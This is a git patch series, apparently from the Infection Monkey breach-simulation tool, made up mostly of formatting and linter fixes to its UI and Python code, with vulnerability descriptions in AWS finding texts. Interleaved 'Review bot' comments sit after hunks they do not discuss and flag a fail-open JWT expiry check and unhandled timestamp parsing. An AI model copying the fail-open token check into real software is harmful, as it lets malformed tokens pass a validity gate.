    - { - this.props.statusesToPillars[status].map((pillar) => { - return - }) - } + { + this.props.statusesToPillars[status].map((pillar) => { + return + }) + }
    } diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/SummarySection.js b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/SummarySection.js index e4012bf50..0f937f341 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/SummarySection.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/zerotrust/SummarySection.js @@ -14,9 +14,10 @@ export default class SummarySection extends Component {

    - Get a quick glance at how your network aligns with the - Zero Trust eXtended (ZTX) framework - . + Get a quick glance at how your network aligns with the + Zero Trust eXtended (ZTX) framework + .

    diff --git a/monkey/monkey_island/cc/ui/src/components/run-monkey/AwsRunTable.js b/monkey/monkey_island/cc/ui/src/components/run-monkey/AwsRunTable.js index 6a8fe9416..f2815a142 100644 --- a/monkey/monkey_island/cc/ui/src/components/run-monkey/AwsRunTable.js +++ b/monkey/monkey_island/cc/ui/src/components/run-monkey/AwsRunTable.js @@ -8,10 +8,10 @@ const columns = [ { Header: 'Machines', columns: [ - { Header: 'Machine', accessor: 'name'}, - { Header: 'Instance ID', accessor: 'instance_id'}, - { Header: 'IP Address', accessor: 'ip_address'}, - { Header: 'OS', accessor: 'os'} + {Header: 'Machine', accessor: 'name'}, + {Header: 'Instance ID', accessor: 'instance_id'}, + {Header: 'IP Address', accessor: 'ip_address'}, + {Header: 'OS', accessor: 'os'} ] } ]; @@ -44,7 +44,7 @@ class AwsRunTableComponent extends React.Component { selection.push(key); } // update the state - this.setState({ selection }); + this.setState({selection}); }; isSelected = key => { @@ -64,7 +64,7 @@ class AwsRunTableComponent extends React.Component { selection.push(item._original.instance_id); }); } - this.setState({ selectAll, selection }); + this.setState({selectAll, selection}); }; getTrProps = (s, r) => { diff --git a/monkey/monkey_island/cc/ui/src/components/ui-components/Checkbox.js b/monkey/monkey_island/cc/ui/src/components/ui-components/Checkbox.js index 74204973a..f200a6fdb 100644 --- a/monkey/monkey_island/cc/ui/src/components/ui-components/Checkbox.js +++ b/monkey/monkey_island/cc/ui/src/components/ui-components/Checkbox.js 
@@ -15,59 +15,68 @@ class CheckboxComponent extends React.PureComponent { this.props.name (the name of this component) and this.state.checked (boolean indicating if this component is checked or not) */ - constructor(props) { - super(props); - this.state = { - checked: this.props.checked, + constructor(props) { + super(props); + this.state = { + checked: this.props.checked, necessary: this.props.necessary, - isAnimating: false - }; - this.toggleChecked = this.toggleChecked.bind(this); - this.stopAnimation = this.stopAnimation.bind(this); - this.composeStateClasses = this.composeStateClasses.bind(this); - } + isAnimating: false + }; + this.toggleChecked = this.toggleChecked.bind(this); + this.stopAnimation = this.stopAnimation.bind(this); + this.composeStateClasses = this.composeStateClasses.bind(this); + } - //Toggles component. - toggleChecked() { - if (this.state.isAnimating) {return false;} - this.setState({ - checked: !this.state.checked, - isAnimating: true, - }, () => { this.props.changeHandler ? this.props.changeHandler(this.props.name, this.state.checked) : null}); - } + //Toggles component. + toggleChecked() { + if (this.state.isAnimating) { + return false; + } + this.setState({ + checked: !this.state.checked, + isAnimating: true, + }, () => { + this.props.changeHandler ? 
this.props.changeHandler(this.props.name, this.state.checked) : null + }); + } - // Stops ping animation on checkbox after click - stopAnimation() { - this.setState({ isAnimating: false }) - } + // Stops ping animation on checkbox after click + stopAnimation() { + this.setState({isAnimating: false}) + } - // Creates class string for component - composeStateClasses(core) { - let result = core; - if (this.state.necessary){ + // Creates class string for component + composeStateClasses(core) { + let result = core; + if (this.state.necessary) { return result + ' blocked' } - if (this.state.checked) { result += ' is-checked'; } - else { result += ' is-unchecked' } + if (this.state.checked) { + result += ' is-checked'; + } else { + result += ' is-unchecked' + } - if (this.state.isAnimating) { result += ' do-ping'; } - return result; - } + if (this.state.isAnimating) { + result += ' do-ping'; + } + return result; + } - render() { - const cl = this.composeStateClasses('ui-checkbox-btn'); - return ( -
    - - -
    -
    - ) - } + render() { + const cl = this.composeStateClasses('ui-checkbox-btn'); + return ( +
    + + +
    +
    + ) + } } export default CheckboxComponent; diff --git a/monkey/monkey_island/cc/ui/src/config/base.js b/monkey/monkey_island/cc/ui/src/config/base.js index 65b6aff99..bea121a3c 100644 --- a/monkey/monkey_island/cc/ui/src/config/base.js +++ b/monkey/monkey_island/cc/ui/src/config/base.js @@ -1,5 +1,4 @@ 'use strict'; // Settings configured here will be merged into the final config object. -export default { -} +export default {} diff --git a/monkey/monkey_island/cc/ui/src/images/infection-monkey.svg b/monkey/monkey_island/cc/ui/src/images/infection-monkey.svg index 3a357890d..ee2d9cda0 100644 --- a/monkey/monkey_island/cc/ui/src/images/infection-monkey.svg +++ b/monkey/monkey_island/cc/ui/src/images/infection-monkey.svg @@ -2,30 +2,45 @@ 14cbedff-3eed-4f8f-abb7-fffe92867ded - - - - - - + + + + + + - - - - - - - - + + + + + + + + - + diff --git a/monkey/monkey_island/cc/ui/src/images/monkey-icon.svg b/monkey/monkey_island/cc/ui/src/images/monkey-icon.svg index 837610f28..5e91edec1 100644 --- a/monkey/monkey_island/cc/ui/src/images/monkey-icon.svg +++ b/monkey/monkey_island/cc/ui/src/images/monkey-icon.svg @@ -2,7 +2,7 @@ @@ -10,8 +10,11 @@ - - - + + + diff --git a/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-machine-icon.svg b/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-machine-icon.svg index 507541be4..341223590 100644 --- a/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-machine-icon.svg +++ b/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-machine-icon.svg @@ -1 +1,13 @@ -im-alert-machine-icon \ No newline at end of file + + im-alert-machine-icon + + + + + + + + + + diff --git a/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-network-icon.svg b/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-network-icon.svg index 50dcc6726..0951d7ae2 100644 --- a/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-network-icon.svg +++ b/monkey/monkey_island/cc/ui/src/images/zerotrust/im-alert-network-icon.svg 
@@ -1 +1,23 @@ -im-alert-network-icon \ No newline at end of file + + im-alert-network-icon + + + + + + + + + + + + + + + + + + + + + diff --git a/monkey/monkey_island/cc/ui/src/index.html b/monkey/monkey_island/cc/ui/src/index.html index 3e7028fc1..38b0c114d 100644 --- a/monkey/monkey_island/cc/ui/src/index.html +++ b/monkey/monkey_island/cc/ui/src/index.html @@ -8,6 +8,6 @@ -
    +
    diff --git a/monkey/monkey_island/cc/ui/src/index.js b/monkey/monkey_island/cc/ui/src/index.js index 329e94dfe..b2c79eaf9 100644 --- a/monkey/monkey_island/cc/ui/src/index.js +++ b/monkey/monkey_island/cc/ui/src/index.js @@ -6,4 +6,4 @@ import App from './components/Main'; import Bootstrap from 'bootstrap/dist/css/bootstrap.css'; // eslint-disable-line no-unused-vars // Render the main component into the dom -ReactDOM.render(, document.getElementById('app')); +ReactDOM.render(, document.getElementById('app')); diff --git a/monkey/monkey_island/cc/ui/src/server_config/AwsConfig.js b/monkey/monkey_island/cc/ui/src/server_config/AwsConfig.js index 1c5814b5a..452bfaede 100644 --- a/monkey/monkey_island/cc/ui/src/server_config/AwsConfig.js +++ b/monkey/monkey_island/cc/ui/src/server_config/AwsConfig.js @@ -1,6 +1,6 @@ import BaseConfig from './BaseConfig'; -class AwsConfig extends BaseConfig{ +class AwsConfig extends BaseConfig { isAuthEnabled() { return true; } diff --git a/monkey/monkey_island/cc/ui/src/server_config/PasswordConfig.js b/monkey/monkey_island/cc/ui/src/server_config/PasswordConfig.js index 359b21bfb..167d1ab60 100644 --- a/monkey/monkey_island/cc/ui/src/server_config/PasswordConfig.js +++ b/monkey/monkey_island/cc/ui/src/server_config/PasswordConfig.js @@ -1,6 +1,6 @@ import BaseConfig from './BaseConfig'; -class PasswordConfig extends BaseConfig{ +class PasswordConfig extends BaseConfig { isAuthEnabled() { return true; } diff --git a/monkey/monkey_island/cc/ui/src/server_config/StandardConfig.js b/monkey/monkey_island/cc/ui/src/server_config/StandardConfig.js index f549f7112..c3ace9a97 100644 --- a/monkey/monkey_island/cc/ui/src/server_config/StandardConfig.js +++ b/monkey/monkey_island/cc/ui/src/server_config/StandardConfig.js @@ -2,7 +2,7 @@ import BaseConfig from './BaseConfig'; class StandardConfig extends BaseConfig { - isAuthEnabled () { + isAuthEnabled() { return false; } } 
diff --git a/monkey/monkey_island/cc/ui/src/services/AuthService.js b/monkey/monkey_island/cc/ui/src/services/AuthService.js index 9c62bde63..3fb70c5bb 100644 --- a/monkey/monkey_island/cc/ui/src/services/AuthService.js +++ b/monkey/monkey_island/cc/ui/src/services/AuthService.js @@ -1,4 +1,4 @@ -import { SHA3 } from 'sha3'; +import {SHA3} from 'sha3'; import decode from 'jwt-decode'; export default class AuthService { @@ -97,8 +97,7 @@ export default class AuthService { _isTokenExpired(token) { try { return decode(token)['exp'] < Date.now() / 1000; - } - catch (err) { + } catch (err) { return false; } } diff --git a/monkey/monkey_island/cc/ui/src/styles/App.css b/monkey/monkey_island/cc/ui/src/styles/App.css index 109f1c147..12a430cf9 100644 --- a/monkey/monkey_island/cc/ui/src/styles/App.css +++ b/monkey/monkey_island/cc/ui/src/styles/App.css @@ -74,14 +74,17 @@ body { background: #e9e9e9; text-decoration: none; } + li a.active { background: #333333; text-decoration: none; color: #ffcc00; } + li a.active:hover { color: #ffcc00; } + li a.disabled { color: #666; cursor: auto; @@ -190,6 +193,7 @@ body { .nav > li > a:focus { background-color: transparent !important; } + /* * Run Monkey Page */ @@ -226,13 +230,16 @@ body { font-size: 20px; } + .preview-pane h3 small { margin-top: 0.5em; display: block; } + .preview-pane h3 .fa { margin-right: 5px; } + .preview-pane h4 { text-transform: uppercase; color: #999; @@ -240,7 +247,7 @@ body { margin-top: 0; } -.preview-pane .table tr:first-child th , .preview-pane .table tr:first-child td { +.preview-pane .table tr:first-child th, .preview-pane .table tr:first-child td { border-top: 0; } @@ -299,7 +306,7 @@ body { left: 0; right: 0; height: 130px; - background: rgba(0,0,0,0.7); + background: rgba(0, 0, 0, 0.7); border-radius: 5px; border: 3px solid #aaa; padding: 0.5em; 
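Review bot: The `catch (err)` branch of `_isTokenExpired` on the new side returns `false`, so a token that `decode` cannot parse is reported as not expired, which is a fail-open default for a validity check. Unless the caller treats a decode failure separately, a malformed or tampered token would pass this client-side gate and only be rejected when the server sees it; I cannot tell from the hunk whether that is the case, since the rest of `AuthService` lies outside it. Changing the branch to `return true;` makes an undecodable token count as expired, which is the safe default for a helper named this way. Worth a one-line comment either way, e.g. `// undecodable token: treat as expired (fail closed)`.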
@@ -329,7 +336,7 @@ body { padding: 0; } -.data-table-container > .container th , .data-table-container > .container td { +.data-table-container > .container th, .data-table-container > .container td { padding: 15px 8px; } @@ -341,7 +348,7 @@ body { margin-left: 1em; } -#search-field , #page-menu { +#search-field, #page-menu { margin-left: 0.5em; margin-bottom: 1em; height: 34px; @@ -477,21 +484,21 @@ body { } .alert-danger { - color:#a94442 !important; - background-color:#f2dede !important; - border-color:#ebccd1 !important; + color: #a94442 !important; + background-color: #f2dede !important; + border-color: #ebccd1 !important; } .alert-success { - color:#3c763d !important; - background-color:#dff0d8 !important; - border-color:#d6e9c6 !important; + color: #3c763d !important; + background-color: #dff0d8 !important; + border-color: #d6e9c6 !important; } .alert-info { - color:#31708f !important; - background-color:#d9edf7 !important; - border-color:#bce8f1 !important; + color: #31708f !important; + background-color: #d9edf7 !important; + border-color: #bce8f1 !important; } .label-default { @@ -529,7 +536,7 @@ body { margin-bottom: 20px; } -.attack-report .btn-collapse span:nth-of-type(2){ +.attack-report .btn-collapse span:nth-of-type(2) { flex: 0; } @@ -580,7 +587,7 @@ body { margin-right: auto; } -.attack-report.footer-text{ +.attack-report.footer-text { text-align: right; font-size: 0.8em; margin-top: 20px; diff --git a/monkey/monkey_island/cc/ui/src/styles/Checkbox.scss b/monkey/monkey_island/cc/ui/src/styles/Checkbox.scss index 3bf0281f6..b18908c5e 100644 --- a/monkey/monkey_island/cc/ui/src/styles/Checkbox.scss +++ b/monkey/monkey_island/cc/ui/src/styles/Checkbox.scss 
@@ -6,100 +6,105 @@ $green: #44CF6C; $black: #000000; .ui-checkbox-btn { - position: relative; - display: inline-block; - background-color: rgba(red, .6); + position: relative; + display: inline-block; + background-color: rgba(red, .6); text-align: center; width: 100%; height: 100%; - input { display: none; } + input { + display: none; + } - .icon, - .text { - display: inline-block; - color: inherit; - } + .icon, + .text { + display: inline-block; + color: inherit; + } - .text { + .text { padding-top: 4px; - font-size: 14px; - } + font-size: 14px; + } - // color states - &.is-unchecked { - background-color: transparent; - color: $black; - fill: $black; - } + // color states + &.is-unchecked { + background-color: transparent; + color: $black; + fill: $black; + } &.blocked { background-color: $dark-green; - color: $light-grey; - fill: $light-grey; + color: $light-grey; + fill: $light-grey; } - &.is-checked { - background-color: $green; - color: white; - fill: white; - } + &.is-checked { + background-color: $green; + color: white; + fill: white; + } } .icon { - position: relative; - display: inline-block; + position: relative; + display: inline-block; - svg { - position: absolute; - top: 0; right: 0; bottom: 0; left: 0; - margin: auto; - width: 16px; - height: auto; - fill: inherit; - } + svg { + position: absolute; + top: 0; + right: 0; + bottom: 0; + left: 0; + margin: auto; + width: 16px; + height: auto; + fill: inherit; + } - .is-checked & { - color: white; - fill: white; - } + .is-checked & { + color: white; + fill: white; + } } // ping animation magic .ui-btn-ping { - position: absolute; - top: 50%; - left: 50%; - width: 100%; - transform: translate3d(-50%, -50%, 0); // center center by default + position: absolute; + top: 50%; + left: 50%; + width: 100%; + transform: translate3d(-50%, -50%, 0); // center center by default - // set the square - &:before { - content: ''; - transform: scale(0, 0); // center center by default - transition-property: background-color 
transform; - transition-timing-function: cubic-bezier(0.0, 0.0, 0.2, 1); - display: block; - padding-bottom: 100%; - border-radius: 50%; - background-color: rgba(white, .84);; - } + // set the square + &:before { + content: ''; + transform: scale(0, 0); // center center by default + transition-property: background-color transform; + transition-timing-function: cubic-bezier(0.0, 0.0, 0.2, 1); + display: block; + padding-bottom: 100%; + border-radius: 50%; + background-color: rgba(white, .84);; + } - .do-ping &:before { - transform: scale(2.5, 2.5); - transition-duration: .35s; - background-color: rgba(white, .08); - } + .do-ping &:before { + transform: scale(2.5, 2.5); + transition-duration: .35s; + background-color: rgba(white, .08); + } } -.icon-checked{ - color:$green +.icon-checked { + color: $green } -.icon-mandatory{ - color:$dark-green +.icon-mandatory { + color: $dark-green } -.icon-unchecked{ - color:$black; +.icon-unchecked { + color: $black; } diff --git a/monkey/monkey_island/cc/ui/src/styles/Collapse.scss b/monkey/monkey_island/cc/ui/src/styles/Collapse.scss index e2d7d334a..9277400b8 100644 --- a/monkey/monkey_island/cc/ui/src/styles/Collapse.scss +++ b/monkey/monkey_island/cc/ui/src/styles/Collapse.scss @@ -14,8 +14,8 @@ $default-color: #e0ddde; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); } -.collapse-item button span:first-child{ - text-align:left; +.collapse-item button span:first-child { + text-align: left; } .collapse-item button { @@ -25,7 +25,8 @@ $default-color: #e0ddde; transition: background-color $transition; display: flex; font-family: inherit; - > span { + + > span { display: inline-block; flex: 4; text-align: right; @@ -50,6 +51,7 @@ $default-color: #e0ddde; .collapse-item { padding: 0.5rem; + &--active { .btn-collapse { background-color: #f7f7f7; 
@@ -61,7 +63,7 @@ $default-color: #e0ddde; padding: 0 7px 7px 7px; border: 2px solid rgb(232, 228, 228); border-top: 0; - display:block !important; + display: block !important; transition: height $transition; overflow: hidden; } @@ -75,12 +77,15 @@ $default-color: #e0ddde; &.collapsing { transform: translateY(-$offset); } + &.collapse-comp { transform: translateY(-$offset); } + &.expanding { transform: translateX(0px); } + &.expanded { transform: translateX(0px); } diff --git a/monkey/monkey_island/cc/utils.py b/monkey/monkey_island/cc/utils.py index 58dff1f5a..01c69e648 100644 --- a/monkey/monkey_island/cc/utils.py +++ b/monkey/monkey_island/cc/utils.py @@ -10,7 +10,6 @@ from ring import lru __author__ = 'Barak' - # Local ips function if sys.platform == "win32": def local_ips(): @@ -19,6 +18,7 @@ if sys.platform == "win32": else: import fcntl + def local_ips(): result = [] try: From e627c8c85742764bfe1e6c481908a0cc2a6142fc Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 21:14:22 +0200 Subject: [PATCH 35/44] Manual fix - auto formatter failed --- monkey/monkey_island/cc/resources/telemetry_feed.py | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/monkey/monkey_island/cc/resources/telemetry_feed.py b/monkey/monkey_island/cc/resources/telemetry_feed.py index 8a8c750b4..6333f2feb 100644 --- a/monkey/monkey_island/cc/resources/telemetry_feed.py +++ b/monkey/monkey_island/cc/resources/telemetry_feed.py 
@@ -22,9 +22,8 @@ class TelemetryFeed(flask_restful.Resource): if "null" == timestamp or timestamp is None: # special case to avoid ugly JS code... telemetries = mongo.db.telemetry.find({}) else: - telemetries = mongo.db.telemetry.find({'timestamp': {'$gt': dateutil.parser.parse(timestamp)}}) \ - \ - telemetries = telemetries.sort([('timestamp', flask_pymongo.ASCENDING)]) + telemetries = mongo.db.telemetry.find({'timestamp': {'$gt': dateutil.parser.parse(timestamp)}}) + telemetries = telemetries.sort([('timestamp', flask_pymongo.ASCENDING)]) try: return \ From dd461b974b219506083d243d68758ad589a5737c Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 21:20:29 +0200 Subject: [PATCH 36/44] Manual fix - auto formatter is confused again :-1: --- .../cc/services/reporting/aws_exporter.py | 34 +++++++++---------- 1 file changed, 17 insertions(+), 17 deletions(-) diff --git a/monkey/monkey_island/cc/services/reporting/aws_exporter.py b/monkey/monkey_island/cc/services/reporting/aws_exporter.py index 19293f991..1df12e2eb 100644 --- a/monkey/monkey_island/cc/services/reporting/aws_exporter.py +++ b/monkey/monkey_island/cc/services/reporting/aws_exporter.py @@ -208,9 +208,9 @@ class AWSExporter(Exporter): description="Protect {ssh_key} private key with a pass phrase.".format(ssh_key=issue['ssh_key']), recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH attack. The Monkey authenticated " "over the SSH protocol with private key {ssh_key}.".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - ssh_key=issue['ssh_key']), + machine=issue['machine'], + ip_address=issue['ip_address'], + ssh_key=issue['ssh_key']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
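Review bot: The new `else` branch still passes `timestamp` straight into `dateutil.parser.parse` with no handling for a malformed value; presumably this comes from the request (the enclosing method starts outside the hunk), so a client sending an unparseable string gets an unhandled `ValueError`/`OverflowError` and a 500 instead of a 400. I would parse into a local first, wrap that in a `try`/`except (ValueError, OverflowError)` that returns a 400 response, and only then build the query. Separately, the sort now applies only in the `else` branch, so the `find({})` path for a `None`/"null" timestamp returns telemetries in unspecified order; if the feed consumer relies on ordering, hoisting `telemetries = telemetries.sort([('timestamp', flask_pymongo.ASCENDING)])` out of the branch fixes both paths.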
@@ -224,8 +224,8 @@ class AWSExporter(Exporter): description="Update your Elastic Search server to version 1.4.3 and up.", recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. The attack was made " "possible because the Elastic Search server was not patched against CVE-2015-1427.".format( - issue['machine'], - issue['ip_address']), + issue['machine'], + issue['ip_address']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -269,7 +269,7 @@ class AWSExporter(Exporter): recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. " "The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a " "shell injection attack on the paths: {3}.".format( - issue['machine'], issue['ip_address'], issue['port'], issue['paths']), + issue['machine'], issue['ip_address'], issue['port'], issue['paths']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -284,9 +284,9 @@ class AWSExporter(Exporter): "network.".format(issue['username']), recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey authenticated over the SMB " "protocol with user {2} and its password.".format( - issue['machine'], - issue['ip_address'], - issue['username']), + issue['machine'], + issue['ip_address'], + issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
@@ -301,9 +301,9 @@ class AWSExporter(Exporter): "network.", recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey authenticated over " "the WMI protocol with user {username} and its password.".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - username=issue['username']), + machine=issue['machine'], + ip_address=issue['ip_address'], + username=issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -318,9 +318,9 @@ class AWSExporter(Exporter): "network.".format(issue['username']), recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey used a " "pass-the-hash attack over WMI protocol with user {username}".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - username=issue['username']), + machine=issue['machine'], + ip_address=issue['ip_address'], + username=issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -361,7 +361,7 @@ class AWSExporter(Exporter): description="This critical machine is open to attacks via strong users with access to it.", recommendation="The services: {services} have been found on the machine thus classifying it as a critical " "machine. These users has access to it:{threatening_users}.".format( - services=issue['services'], threatening_users=issue['threatening_users']), + services=issue['services'], threatening_users=issue['threatening_users']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) 
@@ -386,7 +386,7 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=10, title="Oracle WebLogic servers are vulnerable to remote code execution.", - description="Install Oracle critical patch updates. Or update to the latest version. " \ + description="Install Oracle critical patch updates. Or update to the latest version. " "Vulnerable versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.", recommendation="Oracle WebLogic server at {machine} ({ip_address}) is vulnerable to remote code execution attack." "The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware " From 1f598579ee178f651c8a5050837b3453d1f7570a Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 21:22:14 +0200 Subject: [PATCH 37/44] Linter fixes in `common` --- monkey/common/cloud/aws_instance.py | 2 -- monkey/common/cloud/aws_service.py | 1 - monkey/common/cmd/aws/aws_cmd_result.py | 1 - monkey/common/data/__init__.py | 1 + monkey/common/data/network_consts.py | 1 - monkey/common/data/zero_trust_consts.py | 2 +- monkey/common/network/network_range.py | 3 +-- monkey/common/utils/code_utils.py | 2 -- monkey/common/utils/mongo_utils.py | 1 - 9 files changed, 3 insertions(+), 11 deletions(-) diff --git a/monkey/common/cloud/aws_instance.py b/monkey/common/cloud/aws_instance.py index 5178b0938..4339fbcf4 100644 --- a/monkey/common/cloud/aws_instance.py +++ b/monkey/common/cloud/aws_instance.py @@ -4,14 +4,12 @@ import urllib.request import urllib.error import logging - __author__ = 'itay.mizeretz' AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS = "169.254.169.254" AWS_LATEST_METADATA_URI_PREFIX = 'http://{0}/latest/'.format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS) ACCOUNT_ID_KEY = "accountId" - logger = logging.getLogger(__name__) diff --git a/monkey/common/cloud/aws_service.py b/monkey/common/cloud/aws_service.py index b435b23c7..6ef385542 100644 --- a/monkey/common/cloud/aws_service.py 
+++ b/monkey/common/cloud/aws_service.py @@ -14,7 +14,6 @@ COMPUTER_NAME_KEY = 'ComputerName' PLATFORM_TYPE_KEY = 'PlatformType' IP_ADDRESS_KEY = 'IPAddress' - logger = logging.getLogger(__name__) diff --git a/monkey/common/cmd/aws/aws_cmd_result.py b/monkey/common/cmd/aws/aws_cmd_result.py index c8647bfe4..3499f8d14 100644 --- a/monkey/common/cmd/aws/aws_cmd_result.py +++ b/monkey/common/cmd/aws/aws_cmd_result.py @@ -1,6 +1,5 @@ from common.cmd.cmd_result import CmdResult - __author__ = 'itay.mizeretz' diff --git a/monkey/common/data/__init__.py b/monkey/common/data/__init__.py index a379a4743..978540b10 100644 --- a/monkey/common/data/__init__.py +++ b/monkey/common/data/__init__.py @@ -1,2 +1,3 @@ from .zero_trust_consts import populate_mappings + populate_mappings() diff --git a/monkey/common/data/network_consts.py b/monkey/common/data/network_consts.py index 5fc9d6d8a..b194c9421 100644 --- a/monkey/common/data/network_consts.py +++ b/monkey/common/data/network_consts.py @@ -1,2 +1 @@ ES_SERVICE = 'elastic-search-9200' - diff --git a/monkey/common/data/zero_trust_consts.py b/monkey/common/data/zero_trust_consts.py index ae27b1c35..7135485da 100644 --- a/monkey/common/data/zero_trust_consts.py +++ b/monkey/common/data/zero_trust_consts.py @@ -58,7 +58,7 @@ PRINCIPLES = { PRINCIPLE_DATA_TRANSIT: "Secure data at transit by encrypting it.", PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: "Configure network policies to be as restrictive as possible.", PRINCIPLE_USERS_MAC_POLICIES: "Users' permissions to the network and to resources should be MAC (Mandetory " - "Access Control) only.", + "Access Control) only.", } POSSIBLE_STATUSES_KEY = "possible_statuses" diff --git a/monkey/common/network/network_range.py b/monkey/common/network/network_range.py index 7393ceda2..6a1201e07 100644 --- a/monkey/common/network/network_range.py +++ b/monkey/common/network/network_range.py 
@@ -59,7 +59,7 @@ class NetworkRange(object, metaclass=ABCMeta): ips = address_str.split('-') try: ipaddress.ip_address(ips[0]) and ipaddress.ip_address(ips[1]) - except ValueError as e: + except ValueError: return False return True return False @@ -173,4 +173,3 @@ class SingleIpRange(NetworkRange): return None, string_ # If a string_ was entered instead of IP we presume that it was domain name and translate it return ip, domain_name - diff --git a/monkey/common/utils/code_utils.py b/monkey/common/utils/code_utils.py index b50e01fb0..214e6d108 100644 --- a/monkey/common/utils/code_utils.py +++ b/monkey/common/utils/code_utils.py @@ -1,5 +1,3 @@ - - # abstract, static method decorator # noinspection PyPep8Naming class abstractstatic(staticmethod): diff --git a/monkey/common/utils/mongo_utils.py b/monkey/common/utils/mongo_utils.py index 48d632bcd..854109b30 100644 --- a/monkey/common/utils/mongo_utils.py +++ b/monkey/common/utils/mongo_utils.py @@ -80,4 +80,3 @@ class MongoUtils: continue return row - From 530e1a3b658748841998d6fcab698cdf4c58c504 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 21:25:37 +0200 Subject: [PATCH 38/44] Whitespace fixes --- monkey/common/cloud/aws_service_test.py | 10 +++++----- monkey/infection_monkey/network/info.py | 5 ----- 2 files changed, 5 insertions(+), 10 deletions(-) diff --git a/monkey/common/cloud/aws_service_test.py b/monkey/common/cloud/aws_service_test.py index ae9c4b5d3..cbcbfebcd 100644 --- a/monkey/common/cloud/aws_service_test.py +++ b/monkey/common/cloud/aws_service_test.py 
@@ -10,14 +10,14 @@ class TestFilterInstanceDataFromAwsResponse(TestCase): def test_filter_instance_data_from_aws_response(self): json_response_full = """ { - "InstanceInformationList": [ - { + "InstanceInformationList": [ + { "ActivationId": "string", "AgentVersion": "string", - "AssociationOverview": { + "AssociationOverview": { "DetailedStatus": "string", - "InstanceAssociationStatusAggregatedCount": { - "string" : 6 + "InstanceAssociationStatusAggregatedCount": { + "string" : 6 } }, "AssociationStatus": "string", diff --git a/monkey/infection_monkey/network/info.py b/monkey/infection_monkey/network/info.py index 1418c22cc..6b9c5811e 100644 --- a/monkey/infection_monkey/network/info.py +++ b/monkey/infection_monkey/network/info.py @@ -47,24 +47,19 @@ def get_host_subnets(): if is_windows_os(): - def local_ips(): local_hostname = socket.gethostname() return socket.gethostbyname_ex(local_hostname)[2] - def get_routes(): raise NotImplementedError() - else: from fcntl import ioctl - def local_ips(): valid_ips = [network['addr'] for network in get_host_subnets()] return valid_ips - def get_routes(): # based on scapy implementation for route parsing try: f = open("/proc/net/route", "r") From 933dc9c3783671496be837b49c78bca39414272f Mon Sep 17 00:00:00 2001 From: Shivank Date: Wed, 30 Oct 2019 11:06:25 +0530 Subject: [PATCH 39/44] Second File-saver patch --- .../cc/ui/src/components/pages/ConfigurePage.js | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js b/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js index a5aeae3ec..5cbd758cf 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js 
@@ -1,7 +1,7 @@ import React from 'react'; import Form from 'react-jsonschema-form'; import {Col, Modal, Nav, NavItem} from 'react-bootstrap'; -import FileSaver from "file-saver"; +import FileSaver from 'file-saver'; import AuthComponent from '../AuthComponent'; import { FilePond } from 'react-filepond'; import 'filepond/dist/filepond.min.css'; @@ -309,10 +309,10 @@ class ConfigurePageComponent extends AuthComponent { exportConfig = () => { this.updateConfigSection(); - const JSONString = JSON.stringify(this.state.configuration, null, 2); - const blob = new Blob([JSONString], {type: "text/plain;charset=utf-8"}); + const configAsJson = JSON.stringify(this.state.configuration, null, 2); + const configAsBinary = new Blob([configAsJson], {type: "text/plain;charset=utf-8"}); - FileSaver.saveAs(blob, 'monkey.conf'); + FileSaver.saveAs(configAsBinary, 'monkey.conf'); }; sendConfig() { From 1f5acbc28709d121e0b59181039f3bba6594e5ef Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 31 Oct 2019 10:48:02 +0200 Subject: [PATCH 40/44] Another white screen fix --- .../cc/ui/src/components/pages/MapPage.js | 28 +++++++++++-------- 1 file changed, 16 insertions(+), 12 